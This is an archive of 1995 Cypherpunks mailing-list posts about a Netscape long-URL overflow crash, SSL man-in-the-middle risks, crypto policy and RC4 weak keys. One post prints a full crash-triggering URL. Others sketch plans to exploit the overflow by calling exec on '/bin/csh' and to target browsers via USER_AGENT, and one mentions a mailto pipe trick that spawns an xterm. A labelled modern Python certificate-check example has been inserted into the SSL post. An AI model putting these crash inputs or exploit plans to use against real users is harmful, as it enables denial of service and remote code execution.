
	Sorry, I'll end my ranting now.

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)	     Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yih-Chun Hu <yihchun@u.washington.edu>
Date: Fri, 22 Sep 95 10:04:56 PDT
To: "Dietrich J. Kappe" <goedel@tezcat.com>
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <v01510100ac8821ac2b23@[206.1.161.4]>
Message-ID: <Pine.OSF.3.91j.950922100229.23946B-100000@saul3.u.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Sep 1995, Dietrich J. Kappe wrote:

> Netscape 1.1N on a powermac crashes hard on that url. If anyone wants to try
> it out, I've put up a simple page with the url at
> 

Netscape, Windows (it's a school computer) works fine w/ a proxy.
When there is no proxy, Windows dies. EMM dies. Lots of stuff dies.
So use a proxy.

> http://www.redweb.com/experiment/bug.html
> 
> *warning* view the source before you click on strange links!!!

Sometimes you won't expect it, i.e., for netscape enhancements click
here (or on the Netscape logo).

+---- Yih-Chun Hu (finger:yihchun@cs.washington.edu) ----------------------+
| http://www.cs.washington.edu/homes/yihchun     yihchun@cs.washington.edu |
| http://weber.u.washington.edu/~yihchun         yihchun@u.washington.edu  |
+---- PGP Key Fingerprints (Keys by FINGER or on WWW) ---------------------+
| 1024/E50EC641        B2 A0 DE 9E 36 C0 EB A6  F9 3E D2 DD 2F 27 74 79    |
| 2047/DF0403F9        18 EB 62 C8 7F 06 04 67  42 76 24 E2 99 D1 07 DC    |
+--------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Fri, 22 Sep 95 07:10:59 PDT
To: cypherpunks@toad.com
Subject: SSL Man-in-the-middle
Message-ID: <199509221407.KAA23176@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone given much thought to the feasibility of a man-in-the-middle
attack against an SSL (or other similar) transaction?  To me, the
possibility seems obvious, so I figure it must have been discussed before,
though I haven't seen it.

The basic idea is pretty simple, really a flaw in the user interface of the
browser more than a flaw in SSL.  Neither browsers nor servers routinely
validate that they are communicating with the entity they think they are.
Sure, with netscape you can ask for the document information window, which
shows the server's public key information, but this isn't a common action
among users, and certainly isn't something you'd want to do for every page
you viewed.

The only readily accessible information about security is that blue key at
the bottom of the netscape window.  Netscape docs tell you that if that key
is blue, your transaction is "secure."  In reality, the only thing that key
means is that you've negotiated a session key and are encrypting your
communications.  It says nothing about the fact that you're actually
communicating with the correct party.  Authentication is a large part of
security, and Netscape doesn't make that information conveniently
available.

Consider the following example.  Bob wants to communicate securely with
Alice.  He fires up his "secure" browser, looks up Alice's address in the
DNS and makes a connection.  He then sends Alice a document and
disconnects.

Now consider the following attack on the scenario:  Bob still wants to
communicate with Alice.  He fires up his browser and looks up Alice in the
DNS.  Mallet, who wants the information Bob's sending, has subverted
Alice's DNS server and replaced Alice's IP address with his own, making a
note of the proper value.  Thus, when Bob looks up Alice's address in DNS,
he gets the wrong information and contacts Mallet instead.  Mallet performs
the SSL protocol with Bob, pretending to be the server, and then with
Alice, pretending to be the client.

Since neither the browser nor the server performs any authentication checks,
neither Bob nor Alice knows they are really speaking to Mallet.  The best
Alice can do is check the IP address of the client she's speaking to, but
if Mallet has his own DNS, he can make the IP address map to whatever name
he wants, including Bob, in order to fool Alice.  Even if Alice doesn't
depend on the DNS for IP resolution, she probably doesn't know that the IP
address in question is really Mallet's, since it looks just like any other
IP address to her.

In this scenario, Bob gets a warm fuzzy since his key is blue and he knows
his information is being encrypted as it goes out.  Alice has a smaller
fuzzy, since she believes the transaction is secure from prying eyes.
Mallet has a *really big* fuzzy, since he's able to read the data Bob
sends, decrypt it, save it, then re-send it to Alice.

I've read through the SSL spec, and it provides authentication for both the
server and the client, but these features are rarely used, probably because
they are somewhat inconvenient for the user.  A good first step would be to
include the IP address of the server in the certificate signed by VeriSign.
In this way, browsers could perform automatic checks that the IP address
in the certificate is actually the one that's being communicated with.
This does raise other questions (such as protecting from IP spoofing), but
IMHO would be a good way of providing an automatic "first check" without
inconveniencing users.  The added inconvenience of obtaining a new
certificate when your server's IP address changes is fairly minor, and
could be viewed as necessary overhead for doing secure transactions via the
Net.



--
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/
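
The automatic "first check" proposed in the message above, run side by side with a host-name check, as an added example that is not part of the original post. It assumes the certificate chain has already been validated by the caller and uses the dictionary shape returned by Python's ssl.SSLSocket.getpeercert(); the certificates, host names and addresses are constructed documentation values, and the function names are hypothetical.

```python
import ipaddress

# Constructed certificates in the shape returned by ssl.SSLSocket.getpeercert().
ALICE_CERT = {
    "subjectAltName": (
        ("DNS", "alice.example"),
        ("DNS", "*.shop.alice.example"),
        ("IP Address", "192.0.2.10"),
    )
}
MALLET_CERT = {
    "subjectAltName": (
        ("DNS", "mallet.example"),
        ("IP Address", "198.51.100.66"),
    )
}


def _labels(name):
    """Lower-case a DNS name, drop a trailing dot, split into labels."""
    return name.lower().rstrip(".").split(".")


def dns_match(pattern, host):
    """Match one certificate DNS name against the host the user asked for.
    A '*' may stand only for the entire left-most label."""
    p, h = _labels(pattern), _labels(host)
    if len(p) != len(h):
        return False
    if p[0] == "*":
        # Require at least two literal labels after the wildcard (no "*.com").
        return len(p) >= 3 and p[1:] == h[1:]
    return p == h


def peer_checks(cert, wanted_host, connected_ip):
    """Return (name_ok, ip_ok): does the certificate cover the host name the
    user wanted, and does it list the address actually connected to?"""
    san = cert.get("subjectAltName", ())
    name_ok = any(dns_match(v, wanted_host) for k, v in san if k == "DNS")
    peer = ipaddress.ip_address(connected_ip)
    ip_ok = any(ipaddress.ip_address(v) == peer
                for k, v in san if k == "IP Address")
    return name_ok, ip_ok


def scenarios():
    """(name_ok, ip_ok) for an honest lookup and for a subverted DNS answer
    that sends Bob to Mallet's address."""
    return {
        # DNS is honest: Bob reaches Alice and sees Alice's certificate.
        "honest": peer_checks(ALICE_CERT, "alice.example", "192.0.2.10"),
        # Mallet answers with his own certificate: it lists his own address,
        # so only the name comparison flags the connection.
        "mallet_own_cert": peer_checks(
            MALLET_CERT, "alice.example", "198.51.100.66"),
        # Mallet presents a copy of Alice's certificate from his address:
        # the address comparison flags the connection.
        "mallet_copied_cert": peer_checks(
            ALICE_CERT, "alice.example", "198.51.100.66"),
    }


if __name__ == "__main__":
    for case, (name_ok, ip_ok) in scenarios().items():
        print(f"{case:20s} name_ok={name_ok} ip_ok={ip_ok}")
```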




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott M Fabbri <m1smf99@FRB.GOV>
Date: Fri, 22 Sep 95 07:13:45 PDT
To: perry@piermont.com
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509221243.IAA03781@frankenstein.piermont.com>
Message-ID: <9509221411.AA00721@arcss5.FRB.GOV>
MIME-Version: 1.0
Content-Type: text/plain


> I don't believe the Sun Java stuff would suffer from it, although I
> fear Java a great deal.

Java doesn't break on this one. All you get back is a message saying the 
domain isn't defined.

BTW: This was tested using 

http://foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.
foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo
.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.fo
o.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.f
oo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.
foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo
.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.fo
o.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.f
oo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.
foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo
.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.fo
o.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo/

on a SunOS box using HotJava 1.0 alpha 3.

Scott
--
Scott Fabbri                                  sfabbri@frb.gov
Opinions solely my own -- who else would want them?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pdlamb@iquest.com (Patrick Lamb)
Date: Fri, 22 Sep 95 08:15:53 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Another Netscape Bug (and possible security hole)
Message-ID: <199509221515.KAA01511@vespucci.iquest.com>
MIME-Version: 1.0
Content-Type: text/plain


HotJAVA apparently doesn't suffer from this bug, at least the 1.03 Alpha NT
version.  On the other hand, HotJava does truncate the URL to fit in its
window.  (I suppose I could try a very large screen with a very small font,
just to make sure -- anyone willing to donate a 19" screen or bigger?)

Pat





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Fri, 22 Sep 95 10:32:29 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Netscape for Linux?
In-Reply-To: <43tmht$qfe@tera.mcom.com>
Message-ID: <199509221728.KAA07352@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> In article <199509212125.RAA00188@hoopsnake.cjs.net>, cjs@netcom.com (Christopher J. Shaulis) writes:
> > And the sad part is that now that they have announced that they are
> > dropping their unofficial Linux support, I really want to hurt
> > Netscape badly.
> 
>   This is news to me.  We have engineers spending valuable time keeping
> our linux port running.  If you tell me where you saw this, I will look
> into it.
> 
> 	--Jeff
> 
I, and many other Linux users that I know, have repeatedly contacted
Netscape offering to pay for a Linux version of Navigator - we have usually
been either 'brushed off' or completely ignored.  And now there is no
mention of a Linux port of v2.0 - not surprising that this 'rumor' is
running around.  I think a statement by you or someone else at Netscape
supporting a Linux version would go a long way in reassuring the Linux
community, even if it's something that is going to take a while.

And you might want to drop by the usenet comp.os.linux.* hierarchy - 
they're already working on ways to use your html extensions to design
web pages  that can't be read by Navigator ... 

-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 22 Sep 95 07:25:19 PDT
To: cypherpunks@toad.com
Subject: Re: Another Netscape Bug (and possible security hole)
Message-ID: <9509221425.AA15952@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Received: from relay3.UU.NET [192.48.96.8] by alcor.process.com
>            with SMTP-OpenVMS via TCP/IP; Fri, 22 Sep 1995 03:36 -0400
> Received: from toad.com by relay3.UU.NET with SMTP 
> 	id QQzigj22616; Fri, 22 Sep 1995 03:27:16 -0400
> Received: by toad.com id AA02740; Fri, 22 Sep 95 00:24:28 PDT
> Received: from quilla.tezcat.com by toad.com id AA02734; Fri, 22 Sep 95 00:24:24 PDT
> Received: from [206.1.161.4] (clubred.redweb.com [206.1.161.4]) by quilla.tezcat.com (8.6.12/8.6.12) with SMTP id CAA23469 for <cypherpunks@toad.com>; Fri, 22 Sep 1995 02:24:21 -0500
> X-Sender: goedel@204.128.247.5
> Message-Id: <v01510100ac8821ac2b23@[206.1.161.4]>
> Mime-Version: 1.0
> Content-Type: text/plain; charset="us-ascii"
> Date: Fri, 22 Sep 1995 02:25:21 -0600
> To: cypherpunks@toad.com (Cypherpunks Mailing List)
> From: goedel@tezcat.com (Dietrich J. Kappe)
> Subject: Re: Another Netscape Bug (and possible security hole)
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> >Ray Cromwell writes:
> >> I've found a Netscape bug which I suspect is a buffer overflow and
> >> may have the potential for serious damage. If it is an overflow bug,
> >> then it may be possible to infect every computer which accesses a web
> >> page with Netscape. To see the bug, create an html file containing
> >> the following:
> >
> >Oh brother, this is unbelievable !
> >
> >I'm using Netscape 1.1N under SunOS 4.1.2.

I can crash Netscape 1.1N under NT by entering a URL with 
a very long domain name in the 'Location:' window.


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Fri, 22 Sep 95 07:37:04 PDT
To: Dave Del Torto <ddt@lsd.com>
Subject: Re: Cypherpunks Press release
In-Reply-To: <v03003311ac878dd1ef9a@[129.46.82.94]>
Message-ID: <199509221430.KAA23225@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 22,  6:26, Dave Del Torto sent the following to the NSA's mail
archives:
> Subject: Re: Cypherpunks Press release
|| I think a media contact group is a good idea too, but I think we should
|| handle it by having a special address <cypherpunks-press@toad.com> that
|| media people can send to to request information and that it should split
|| the incoming mail and route it to a group of volunteers who could then
|| respond. Question from media people are usually NOT going to be heavily
|| tech-oriented, and this sort of press list would give the lesser
|| cryptologists among us, who nevertheless have a significant amount of
|| knowledge about public policy issues concerning crypto, a chance to be
|| useful.
||

I like this idea, too, except that it presupposes that the journalists who
want to contact cypherpunks have access to email.  Although that's a common
thing, it's not uniformly available yet.  Still, it's a useful service for
those journalists who do have access to email.  Perhaps both could be done,
with the people on the mailing list also available via conventional means
for the less techno-savvy journalists.

--
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Somogyi <somogyi@digmedia.com>
Date: Fri, 22 Sep 95 10:45:53 PDT
To: cypherpunks@toad.com
Subject: Re: "Gnusaic"? Why not a Gnu-Style Web Browser?
Message-ID: <v03003400ac88a55e4e4b@[198.93.25.99]>
MIME-Version: 1.0
Content-Type: text/plain


At 23:23 21.9.95, Alex Tang wrote:

> Yes.  This has been done.  A set of patches for NCSA's HTTPd (for US
> folks only) can be found at
>
>       http://petrified.cic.net/~altitude/ssl/howto.html
>
> I got the patches from the ssleay gang in AU, but i haven't seen them on
> their ftp site yet, so if you're outside the states, it'll be available
> rsn (i think...)

Has anyone already created the necessary patches for Apache
<http://www.apache.org/>, or does anyone know whether the Apache dev
team would be amenable to including conditional directives to allow the
build of a secure version? If anyone is thinking of making the effort
to create a publicly available secure server, Apache's probably the
best source base to work with.

________________________________________________________________________
Stephan Somogyi            Think Tank Grenadier            Digital Media






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 22 Sep 95 08:09:16 PDT
To: wb8foz@netcom.com (David Lesher)
Subject: Re: Council of Europe proposes to outlaw strong encryption (fwd)
Message-ID: <199509221509.LAA09991@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>The proposal would make telecoms operators responsible for decrypting         
>traffic and supplying it to governments when asked.  It would also             
>`change national laws to enable judicial authorities to chase hackers          
>across borders'.                                                               
>                                                                               
>However, `it remains possible that cryptography is available          
>to the public which cannot be deciphered,' his document says. `This            
>might lead to the conclusion to put restrictions on the possession,            
>distribution, or use of cryptography.'                
                         
This should prove about as effective as the current French or Russian bans.
What are they going to do when they figure out that there need no longer be
such a thing as a telecoms operator.  We do most of the message packaging
ourselves.  It will be a bit difficult for any connectivity supplier to tell
what's going out via one of our encrypted IP sessions.

Question for Perry -- I'm assuming that it will soon be possible to
originate encrypted TCP/IP sessions with a distant "process" somewhere.  Do
you see technical problems with a TCP/IP laundry being established
"somewhere" that strips trace info from one of my processes and prevents
back tracing beyond the mouth of this encrypted pipe?

Also Perry, what did you think of the article "How Anarchy Works" in the
latest Wired on the IETF?

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Fri, 22 Sep 95 08:15:08 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509221511.LAA09778@grape-nuts.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



I just received the following email message:

   I just concluded a small number of trades whereby I purchased cb$ with US$
   at the rate of US$8 per cb$100. An obvious concern with ticker tapes is the
   loss of privacy. The truly paranoid should avoid even posting exchange
   rates, but even regular folks might want to avoid the details of each of
   their transactions.

I still think a ticker tape to ecm with concluded transactions and
bids taking place on the electronic cash market web pages is useful.

I don't want to spend time polling various exchanges.  The ticker tape
could also be used to do arbitrage between exchanges.

The names of the participants can be omitted to protect anonymity of
traders.  Besides, if the traders really want to protect anonymity
they'll be working through remailers or TCP tunnels.

The exchange SHOULD be listed on the ticker tape, so that people
wanting to trade can find the spot where they can make the trade.
This then serves as an advertising means for the exchanges which are
offering the best prices and volume, etc.

In any transaction one of the two parties will have wished they'd
known the market price, if the price of the transaction is not at the
market price.

This ignores the value of the reputation of the parties involved, etc.

So I propose that transactions and offers be sent to ecm in the
following form:

E=<number> US=<number> BUY-OFFER|SELL-OFFER|CONCLUDED DATE TIME serial# EUID=<exchange-uid>

which is more or less the original syntax for ecm, substituting the
exchange UID for the email address of the person making the offer.

As usual the syntax is optional, so you should feel free to append
other information as you'd like (expiration date, method of concluding
transaction, etc.)

---
Concurrent VLSI Arch. Group     545 Technology Sq., Rm. 610
MIT AI Lab                      Cambridge, MA 02139 (617)-253-0972

(To subscribe to ecm, send email to ecm-request@ai.mit.edu with the
word subscribe in the body.  A digest version is available at
ecm-digest-request.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 22 Sep 95 11:28:44 PDT
To: rjc@clark.net (Ray Cromwell)
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509221713.NAA11980@clark.net>
Message-ID: <199509221823.LAA19265@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Suggestion: Once you figure out how to exploit it for a
particular platform write a cgi-script which checks the USER_AGENT (or
whatever it is called) environment variable to make sure the netscape
that has reached your exploit is the same platform as the exploit was
written for.

> 
> Perry writes:
> > > These buffer overflow bugs should be taught in every programming
> > > 101 course along with fencepost errors.
> > > 
> > > I'm not even sure if I want to write the obligatory program to exploit
> > > the hack given that some malicious jerk would probably use it
> > > on his home page to attack people.
> > 
> > The problem is that if you don't produce a (benign) exploit people
> > aren't going to take it seriously enough.
> 
>   Yeah, I guessed that. I'll work on it, I have a few doubts I have
> to research first. For instance, how to embed code in the domain that
> 1) server/client processing won't "cook" and 2) contains no isolated
> zero bytes which would null terminate the string.
> 
>   My current idea is to look in Netscape for an "exec" routine,
> and call it passing a "/bin/csh" to it.
> 
>   Irregardless, it's a nasty bug given that you can crash anyone's
> netscape. And on Mac/Win3.1, it may even require a reboot.
> 
> -Ray


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Halvor Kise jr." <halvork@frodo.hiof.no>
Date: Fri, 22 Sep 95 02:25:51 PDT
To: cypherpunks@toad.com
Subject: Arena as well (was: Netscape Bug)
Message-ID: <Pine.LNX.3.91.950922112351.8228C-100000@frodo.hiof.no>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----




I am sorry to report that also Arena has this bug..
:-(

- - Halvor.

Ray Cromwell said:
I've found a Netscape bug which I suspect is a buffer overflow and
may have the potential for serious damage. If it is an overflow bug,
then it may be possible to infect every computer which accesses a web
page with Netscape. To see the bug, create an html file containing
the following:

<a href="http://foo.bar.foo.foo.foo.foo.foo.foo......
[lots deleted  :-]


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.0

iQCVAwUBMGKC4mzoaW8/SAL5AQFPrAP+Jy8fJqK5BCNQASE36NUQGs3rISlLZ1QV
PswGNegapIuD+UlTKGpNi+8QVHG5ZEKbtAmRVO9SdOiPyFWBbpLBuh9IVIstj8d1
StcqTc9FcILpxBDsi/OLuZyL3iN/CgMFlwmYj0ClEQGG4DexWP+mbD9MPANC7Nf/
duSH+Dpzf3c=
=9onX
-----END PGP SIGNATURE-----
 
--
                          *** MEMENTO MORI ***

                PGP-key by fingering halvork@frodo.hiof.no
                       http://www.hiof.no/~halvork/

            * Support The Phil Zimmermann legal defense fund *
                      http://www.netresponse.com/zldf





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Thu, 21 Sep 95 18:40:27 PDT
To: nsb@nsb.fv.com
Subject: Re: first virtual "security" (!!) (was Re: Security Flaw Is Discovered InSoftware Used in Shopping)
In-Reply-To: <RM:c0d83d13.000a7d3b.0>
Message-ID: <199509220137.LAA12354@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Laurent Demailly <dl@hplyot.obspm.fr>
  and "NSB's Portable (via RadioMail)" <nsb@radiomail.net>
  and cypherpunks@toad.com

"NSB's Portable (via RadioMail)" <nsb@radiomail.net> writes:
> At  4:32 AM 9/21/95 +0200, Laurent Demailly wrote:
...
> >financial insecurity never was a problem as
> >long as it remains under a small %.
> 
> This is an amazing statement, Laurent.
...

It's not an amazing statement. As long as the cost of insecurity is
less than cost of security, there's no problem.

...
> We're not opposed to cryptography, by the way.  There are some obvious
> places where the use of digital signatures could directly enhance our
...

Okay, so what's stopping you from starting right now with PGP?
You could simply have that as an alternative to the current system
(on a per-ID basis, ie new customers specify PGP or not).

Quite a few people both have PGP and would think well of you if you
started using it.

How about "The safest Internet payment system just got safer."?


Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGITYCxV6mvvBgf5AQGN0wP8DxZ50ZMR3H+W6LCc0vhFZ6GMrTRZPSM4
XULabVj4w59aEDUWj2wbueXaPJUMHpAgYK83oMGLtlu1Hrxzo9/SXT/WzcMUZp7q
qajmCXRY9q3b+OXznTLavrF5qISlPY8NU/HbSi/nCF8kbT6eEf8rXc/uZgPCyV6j
RuvE2VDWaCc=
=J4iR
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: heesen@zpr.uni-koeln.de (Rainer Heesen)
Date: Fri, 22 Sep 95 02:46:54 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: YET ANOTHER BAD NETSCAPE HOLE!
In-Reply-To: <9509220850.AA07248@cs.umass.edu>
Message-ID: <9509221146.ZM25754@Sysiphos.MI.Uni-Koeln.DE>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 22,  4:50am, Futplex wrote:
> Subject: Re: YET ANOTHER BAD NETSCAPE HOLE!
> Ray Cromwell writes:
> > WOW!! Unbelievable! Stop the presses! I Can't believe no one ever discovered
> > this before! Try a page with the following URL
> >
> >  test 
> >
> > Muahaha! Yet another security hole! Clicking on this mailto brings up
> > an xterm on my machine!
>
> This is curious, because Netscape 1.1N doesn't do this on my setup, unless I
> misunderstand your description somehow. The full string including the pipe
> and all come up in the To: field of the standard Netscape mailer window. At
> that stage I see it as much less of a potential risk. I can't test what
> happens if you actually try to send mail to such a trojan horse URL, because
> there's some screwy configuration here that makes Netscape complain about
> not being able to connect to localhost (!?!) when I try to send mail from it.
>
> Mosaic 2.4 gives a standard warning page in response to this.
>
> (I'm using SunOS 4.1.2)
>
> -Futplex <futplex@pseudonym.com>
>-- End of excerpt from Futplex

This is not curious. Ray uses a very old sendmail version. It's not a Netscape
bug, it's rather a sendmail bug.

Cheers

  Rainer





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Fri, 22 Sep 95 11:51:21 PDT
To: stewarts@ix.netcom.com
Subject: Re: Project: a standard cell random number generator
Message-ID: <9509221852.AA23179@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


>At 02:50 PM 9/20/95 -0700, you wrote:
 
>> In this sense, NSA ought to be *encouraging* Intel and
>>IBM and Motorola to put "generate random bits" instructions into
>>their instruction sets...
 
Intel produces a random generator (in a chip package) that is used
in STU-II..'s.  You can't buy such devices, random sources good enough
to be used for initialization for military grade cryptography are Controlled
Cryptographic Items.
 
One would think that the NSA is attempting to exploit the lack of availability
of random initialization values against their targets.  The question becomes
one of whether or not the general populace (of the U.S.) is considered a
potential target, or simply casualties of the situation in undeclared        
hostilities.
 
As a minimum one could infer that the availability of random numbers is
considered quite important for NSA secure communications.  I used to work
at a company that subscribed to NSA (National Standards Association) which
provided government and other standards on microfiche and/or hardcopy.
 
There was an interval before Reagan took office when the NSA provided all
of their unclassified standards into general availability, an era of
openness that came to an end with the Star Wars era.  One of those standards
was for random data sources.  The only recent standards that come to mind
are the X.509 stuff for session key generation, FIPS PUB 140-1 which
describes randomizer tests, and the recent FIPS PUB for a password generator.
These three use block ciphers to produce pseudo-random output.
 
If NSA requires real stochastic results for military crypto, what would
we as casual cryptographers feel comfortable with?  The Netscape episode
shows the comfort level needs improving.

How good is good enough?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Roos <AndrewR@beetle.vironix.co.za>
Date: Fri, 22 Sep 95 03:01:07 PDT
To: "'rivest@theory.lcs.mit.edu>
Subject: Weak Keys in RC4
Message-ID: <3062899D@beetle.vironix.co.za>
MIME-Version: 1.0
Content-Type: text/plain



 -----BEGIN PGP SIGNED MESSAGE-----

                  A CLASS OF WEAK KEYS IN THE RC4 STREAM CIPHER

                                PRELIMINARY DRAFT

                                   ANDREW ROOS
                          VIRONIX SOFTWARE LABORATORIES


1.  INTRODUCTION

This paper discusses a class of weak keys in RSA's RC4 stream cipher. It shows
that for at least 1 out of every 256 possible keys the initial byte of the
pseudo-random stream generated by RC4 is strongly correlated with only a few
bytes of the key, which effectively reduces the work required to exhaustively
search RC4 key spaces.


2.  STATE TABLE INITIALIZATION IN RC4

Although the RC4 algorithm has not been published by RSA Data Security, source
code to implement the algorithm was anonymously posted to the Cypherpunks
mailing list several months ago. The success of the Cypherpunks' brute-force
attack on SSL with a 40-bit key indicates that the source code published did
accurately implement RC4.

RC4 uses a variable length key from 1 to 256 bytes to initialize a 256-byte
state table which is used for the subsequent generation of pseudo-random bytes.
The state table is first initialized to the sequence {0,1,2,...,255}. Then:

1    index1 = 0;
2    index2 = 0;
3
4    for(counter = 0; counter < 256; counter++)
5    {
6        index2 = (key_data_ptr[index1] + state[counter] + index2) % 256;
7        swap_byte(&state[counter], &state[index2]);
8        index1 = (index1 + 1) % key_data_len;
9    }

Note that the only line which directly affects the state table is line 7, when
two bytes in the table are exchanged. The first byte is indexed by "counter",
which is incremented for each iteration of the loop. The second byte is
indexed by "index2" which is a function of the key. Hence each element of the
state table will be swapped at least once (although possibly with itself),
when it is indexed by "counter". It may also be swapped zero, one or more
times when it is indexed by "index2". If we assume for the moment that
"index2" is a uniformly distributed pseudo-random number, then the probability
that a particular single element of the state table will be indexed by
"index2" at some time during the initialization routine is:

     P = 1 - (255/256) ^ 255
       = 0.631

(The exponent is 255 because we can disregard the case when "index2" and
"counter" both index the same element, since this will not affect its value.)

Conversely, there is a 37% probability that a particular element will _not_ be
indexed by "index2" during initialization, so its final value in the state
table will only be affected by a single swap, when it is indexed by "counter".
Since key bytes are used sequentially (starting again at the beginning when the
key is exhausted), this implies:

A.   Given a key length of K bytes, and E < K, there is a 37% probability that
     element E of the state table depends only on elements 0..E (inclusive) of
     the key.

(This is approximate since "index2" is unlikely to be uniformly distributed.)

In order to make use of this, we need to determine the most likely values for
elements of the state table. Since each element is swapped at least once (when
it is indexed by "counter"), it is necessary to take into account the likely
effect of this swap. Swapping is a nasty non-linear process which is hard to
analyze. However, when dealing with the first few elements of the state table,
there is a high probability that the byte with which the element is swapped
has not itself been involved in any previous exchanges, and therefore retains
its initial value {0,1,2,...,255}. Similarly, when dealing with the first few
elements of the state table, there is also a significant probability that none
of the state elements added to index2 in line 6 of the algorithm has been
swapped either.

This means that the most likely value of an element in the state table can be
estimated by assuming that state[x] == x in the algorithm above. In this case,
the algorithm becomes:

1    index1 = 0;
2    index2 = 0;
3
4    for(counter = 0; counter < 256; counter++)
5    {
6        index2 = (key_data_ptr[index1] + counter + index2) % 256;
7        state[counter] = index2;
8        index1 = (index1 + 1) % key_data_len;
9    }

Which can be reduced to:

B.   The most likely value for element E of the state table is:

     S[E] = X(E) + E(E+1)/2
     where X(E) is the sum of bytes 0..E (inclusive) of the key.

